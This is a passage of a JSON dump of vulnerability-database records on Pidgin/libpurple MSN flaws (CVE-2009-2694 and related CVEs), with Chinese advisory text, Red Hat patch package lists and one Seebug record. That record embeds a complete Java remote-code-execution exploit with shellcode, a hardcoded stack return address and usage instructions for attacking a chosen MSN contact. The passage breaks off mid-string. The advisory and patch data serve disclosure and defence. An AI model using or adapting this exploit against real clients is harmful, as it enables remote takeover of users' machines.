00\u4e2a\u95ee\u9898\uff1a\r\n\r\n/-----------\r\n\r\nif (offset == 0)\r\n{\r\n .. construct a new slpmsg ..\r\n}\r\nelse\r\n{\r\n slpmsg = msn_slplink_message_find(slplink,\r\nmsg->msnslp_header.session_id, msg->msnslp_header.id);\r\n}\r\n\r\nif (slpmsg == NULL)\r\n{\r\n /* Probably the transfer was canceled */\r\n purple_debug_error("msn", "Couldn't find slpmsg\\n");\r\n return;\r\n}\r\n\r\n- -----------/\r\n\r\n\u56e0\u6b64\uff0cslpmsg\u5fc5\u987b\u4e3a\u975e\u7a7a\uff0c\u8fd9\u5c31\u662f\u4e3a\u4ec0\u4e48\u9700\u8981\u53d1\u9001\u4e24\u6b21\u6d88\u606f\u624d\u80fd\u8fdb\u884c\u653b\u51fb\u3002\u53d1\u9001\u7684\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\u504f\u79fb\u4e3a0\uff0c\u7528\u4e8e\u521b\u5efaslpmsg\u5bf9\u8c61\uff0cLibpurple\u4f1a\u5b58\u50a8\u8fd9\u4e2a\u5bf9\u8c61\uff1b\u7b2c\u4e8c\u4e2aMSNSLP\u6d88\u606f\u7684\u504f\u79fb\u975e0\uff0c\u4f46\u7531\u4e8eLibpurple\u5df2\u7ecf\u5b58\u50a8\u4e86\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\uff0c\u56e0\u6b64\u8c03\u7528msn_slplink_message_find()\u4f1a\u6709\u6548\u7684\u8fd4\u56de\u4e4b\u524d\u7684\u5bf9\u8c61\u800c\u4e0d\u662fNULL\uff1a\r\n\r\n/-----------\r\n\r\nif (slpmsg->fp)\r\n{\r\n /* fseek(slpmsg->fp, offset, SEEK_SET); */\r\n len = fwrite(data, 1, len, slpmsg->fp);\r\n}\r\nelse if (slpmsg->size)\r\n{\r\n if (G_MAXSIZE - len < offset || (offset='' + len='') > slpmsg->size)\r\n {\r\n purple_debug_error("msn",\r\n "Oversized slpmsg - msgsize=%lld offset=%" G_GSIZE_FORMAT "\r\nlen=%" G_GSIZE_FORMAT "\\n",\r\n slpmsg->size, offset, len);\r\n g_return_if_reached();\r\n }\r\n else\r\n memcpy(slpmsg->buffer + offset, data, len);\r\n }\r\n\r\n- -----------/\r\n\r\n\u4f8b\u5982\uff0c\u5982\u679c\u521b\u5efa\u7684\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\u5927\u5c0f\u4e3a0x01ffffff\uff0c\u7b2c\u4e8c\u4e2a\u6d88\u606f\u7684\u504f\u79fb\u4e3a\u5c0f\u4e8e0x01ffffff - len\u7684\u4efb\u610f\u503c\uff0c\u5c31\u6ee1\u8db3\u4e86\u4efb\u610f\u5199\u5165\u7684\u6761\u4ef6\u3002\r\n\r\n\u6700\u540e\uff0c\u4ee5\u5c0f\u4e8e0x01ffffff - len\u7684\u4efb\u610f\u504f\u79fb\u503c\u5230\u8fbe\u4e86memcpy()\uff0c\u7f13\u51b2\u533a\u6307\u54110\u3002\u8fd9\u610f\u5473\u7740\u53ef\u4ee5\u5411\u4f4e\u4e8e0x01ffffff - len\u7684\u4efb\u610f\u4f4d\u7f6e\u5199\u5165\u6570\u636e\u5185\u5bb9\u3002\n\nRob Flynn Gaim >= 0.79\r\nPidgin Pidgin 2.5.8\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2009:1218-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2009:1218-01\uff1aCritical: pidgin security update\r\n\u94fe\u63a5\uff1ahttps://www.redhat.com/support/errata/RHSA-2009-1218.html\r\n\r\nPidgin\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.pidgin.im/news/security/?id=34", "reporter": "Root", "published": "2009-08-21T00:00:00", "title": "Pidgin Libpurple\u5e93msn_slplink_process_msg()\u51fd\u6570\u5185\u5b58\u7834\u574f\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2694"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-08-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12092", "id": "SSV:12092", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T14:11:42", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "title": "Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2694"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66870", "id": "SSV:66870", "sourceData": "\n /*\r\n* Pidgin MSN <= 2.5.8 Remote Code Execution\r\n*\r\n* Pierre Nogues - pierz@hotmail.it\r\n* http://www.indahax.com/\r\n*\r\n*\r\n* Description:\r\n* Pidgin is a multi-protocol Instant Messenger.\r\n*\r\n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].\r\n* The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets\r\n* which could lead to memory corruption.\r\n*\r\n* Affected versions :\r\n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.\r\n*\r\n* Plateforms :\r\n* Windows, Linux, Mac\r\n*\r\n* Fix :\r\n* Fixed in Pidgin 2.5.9\r\n* Update to the latest version : http://www.pidgin.im/download/\r\n*\r\n* References :\r\n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\r\n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write\r\n* [3] http://www.pidgin.im/news/security/?id=34\r\n*\r\n* Usage :\r\n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/\r\n* javac.exe -cp "%classpath%;.\\jml-1.0b3-full.jar" PidginExploit.java\r\n* java -cp "%classpath%;.\\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\r\n*\r\n*/\r\n\r\nimport net.sf.jml.*;\r\nimport net.sf.jml.event.*;\r\nimport net.sf.jml.impl.*;\r\nimport net.sf.jml.message.p2p.*;\r\nimport net.sf.jml.util.*;\r\n\r\npublic class PidginExploit {\r\n\r\n private MsnMessenger messenger;\r\n private String login;\r\n private String password;\r\n private String target;\r\n\r\n private int session_id = NumberUtils.getIntRandom();\r\n\r\n private byte shellcode[] = new byte[] {\r\n\r\n /*\r\n * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !\r\n * sub esp,500\r\n */\r\n (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,\r\n\r\n\r\n /*\r\n * windows/exec - 121 bytes\r\n * http://www.metasploit.com\r\n * EXITFUNC=process, CMD=calc.exe\r\n */\r\n (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,\r\n (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,\r\n (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,\r\n (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,\r\n (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,\r\n (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,\r\n (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,\r\n (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,\r\n (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,\r\n (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,\r\n (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,\r\n (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,\r\n (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,\r\n (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,\r\n (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,\r\n (byte) 0x00\r\n };\r\n\r\n // reteip = pointer to the return address in the stack\r\n // The shellcode will be wrote just before reteip\r\n // and reteip will automaticly point to the shellcode. It's magic !\r\n private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8\r\n\r\n private int neweip;\r\n private byte[] payload = new byte[shellcode.length + 4];\r\n private int totallength = reteip + 4;\r\n\r\n public static void main(String[] args) throws Exception {\r\n\r\n if(args.length != 3){\r\n System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");\r\n }else{\r\n PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);\r\n exploit.start();\r\n }\r\n\r\n }\r\n\r\n public PidginExploit(String login, String password, String target){\r\n this.login = login;\r\n this.password = password;\r\n this.target = target;\r\n\r\n neweip = reteip - shellcode.length ;\r\n\r\n for(int i=0;i<shellcode.length;i++)\r\n payload[i] = shellcode[i];\r\n\r\n payload[shellcode.length] = (byte)(neweip & 0x000000FF);\r\n payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);\r\n payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);\r\n payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);\r\n }\r\n\r\n public void start() {\r\n messenger = MsnMessengerFactory.createMsnMessenger(login,password);\r\n messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);\r\n\r\n messenger.setLogIncoming(false);\r\n messenger.setLogOutgoing(false);\r\n\r\n initMessenger(messenger);\r\n messenger.login();\r\n }\r\n\r\n protected void initMessenger(MsnMessenger messenger) {\r\n\r\n messenger.addContactListListener(new MsnContactListAdapter() {\r\n\r\n public void contactListInitCompleted(MsnMessenger messenger) {\r\n\r\n final Object id = new Object();\r\n\r\n messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {\r\n\r\n public void switchboardStarted(MsnSwitchboard switchboard) {\r\n\r\n if (id != switchboard.getAttachment())\r\n return;\r\n\r\n switchboard.inviteContact(Email.parseStr(target));\r\n }\r\n\r\n public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {\r\n if (id != switchboard.getAttachment())\r\n return;\r\n\r\n MsnP2PSlpMessage msg = new MsnP2PSlpMessage();\r\n msg.setIdentifier(NumberUtils.getIntRandom());\r\n msg.setSessionId(session_id);\r\n msg.setOffset(0);\r\n msg.setTotalLength(totallength);\r\n msg.setCurrentLength(totallength);\r\n\r\n // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null\r\n // We'll use this buffer to rewrite memory in the stack\r\n msg.setFlag(0x1000020);\r\n\r\n msg.setP2PDest(target);\r\n\r\n switchboard.sendMessage(msg);\r\n\r\n System.out.println("First packet sent, waiting for the ACK");\r\n\r\n }\r\n\r\n public void switchboardClosed(MsnSwitchboard switchboard) {\r\n System.out.println("switchboardClosed");\r\n switchboard.getMessenger().removeSwitchboardListener(this);\r\n }\r\n\r\n public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){\r\n System.out.println("contactLeaveSwitchboard");\r\n }\r\n });\r\n messenger.newSwitchboard(id);\r\n }\r\n });\r\n\r\n messenger.addMessageListener(new MsnMessageAdapter(){\r\n\r\n public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {\r\n\r\n //We receive the ACK of our first packet with the ID of the new bogus packet\r\n message.getIdentifier();\r\n\r\n MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,\r\n payload.length, payload, target);\r\n\r\n switchboard.sendMessage(msg);\r\n System.out.println("ACK received && Payload sent !");\r\n System.out.println("Exploit OK ! CTRL+C to quit");\r\n\r\n }\r\n });\r\n\r\n\r\n\r\n messenger.addMessengerListener(new MsnMessengerAdapter() {\r\n\r\n public void loginCompleted(MsnMessenger messenger) {\r\n System.out.println(messenger.getOwner().getEmail() + " login");\r\n }\r\n\r\n public void logout(MsnMessenger messenger) {\r\n System.out.println(messenger.getOwner().getEmail() + " logout");\r\n }\r\n\r\n public void exceptionCaught(MsnMessenger messenger,\r\n Throwable throwable) {\r\n System.out.println("caught exception: " + throwable);\r\n }\r\n });\r\n\r\n }\r\n}\r\n\r\n// milw0rm.com [2009-09-09]\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66870", "status": "cve,poc"}, {"lastseen": "2017-11-19T18:49:52", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 35067\r\nCVE(CAN) ID: CVE-2009-1376,CVE-2009-1375,CVE-2009-1374,CVE-2009-1373\r\n\r\nPidgin\u662f\u652f\u6301\u591a\u79cd\u534f\u8bae\u7684\u5373\u65f6\u901a\u8baf\u5ba2\u6237\u7aef\u3002\r\n\r\nPidgin\u5728\u5904\u7406\u5404\u79cd\u5373\u65f6\u6d88\u606f\u65f6\u5b58\u5728\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u53ef\u80fd\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u5b8c\u5168\u5165\u4fb5\u7528\u6237\u7684\u7cfb\u7edf\u3002\r\n\r\n1) \u5904\u7406MSN SLP\u6d88\u606f\u65f6\u7684\u622a\u5c3e\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n2) XMPP SOCKS5 bytestream\u670d\u52a1\u5668\u5728\u521d\u59cb\u5316\u51fa\u7ad9\u6587\u4ef6\u4f20\u8f93\u65f6\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n3) PurpleCircBuffer\u7ed3\u6784\u7684\u5b9e\u73b0\u4e2d\u5b58\u5728\u8fb9\u754c\u6761\u4ef6\u9519\u8bef\uff0c\u7279\u5236\u7684XMPP\u6216Sametime\u62a5\u6587\u53ef\u80fd\u5bfc\u81f4\u5185\u5b58\u7834\u574f\u800c\u5d29\u6e83\u3002\r\n\r\n4) \u7279\u5236\u7684QQ\u62a5\u6587\u53ef\u80fd\u5bfc\u81f4decrypt_out()\u51fd\u6570\u51fa\u73b08\u4e2a\u5b57\u8282\u7684\u6808\u6ea2\u51fa\u3002\r\n\n\nPidgin < 2.5.6\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2009:1060-02\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2009:1060-02\uff1aImportant: pidgin security update\r\n\u94fe\u63a5\uff1a<a href=\"https://www.redhat.com/support/errata/RHSA-2009-1060.html\" target=\"_blank\" rel=external nofollow>https://www.redhat.com/support/errata/RHSA-2009-1060.html</a>", "reporter": "Root", "published": "2009-05-25T00:00:00", "type": "seebug", "title": "Pidgin\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1375", "CVE-2009-1376"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-05-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11415", "id": "SSV:11415", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "status": "details"}], "redhat": [{"lastseen": "2018-05-27T21:42:50", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.5.9-1.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.5.9-1.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.5.9-1.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.5.9-1.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.5.9-1.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.5.9-1.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.5.9-1.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.5.9-1.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "src", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el4.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.5.9-1.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageName": "finch", "packageFilename": "finch-2.5.9-1.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageName": "libpurple", "packageFilename": "libpurple-2.5.9-1.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.5.9-1.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.5.9-1.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.5.9-1.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.5.9-1.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.5.9-1.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.5.9-1.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.5.9-1.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.5.9-1.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageName": "libpurple", "packageFilename": "libpurple-2.5.9-1.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.5.9-1.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.5.9-1.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageName": "finch", "packageFilename": "finch-2.5.9-1.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.5.9-1.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ppc", "packageName": "finch", "packageFilename": "finch-2.5.9-1.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ppc", "packageName": "libpurple", "packageFilename": "libpurple-2.5.9-1.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ppc", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.5.9-1.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ppc", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.5.9-1.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ppc", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ppc", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.5.9-1.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ppc", "packageName": "finch-devel", "packageFilename": "finch-devel-2.5.9-1.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ppc", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.5.9-1.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ppc", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.5.9-1.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "libpurple", "packageFilename": "libpurple-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "finch", "packageFilename": "finch-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "src", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el5.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.5.9-1.el5.i386.rpm", "operator": "lt"}], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging 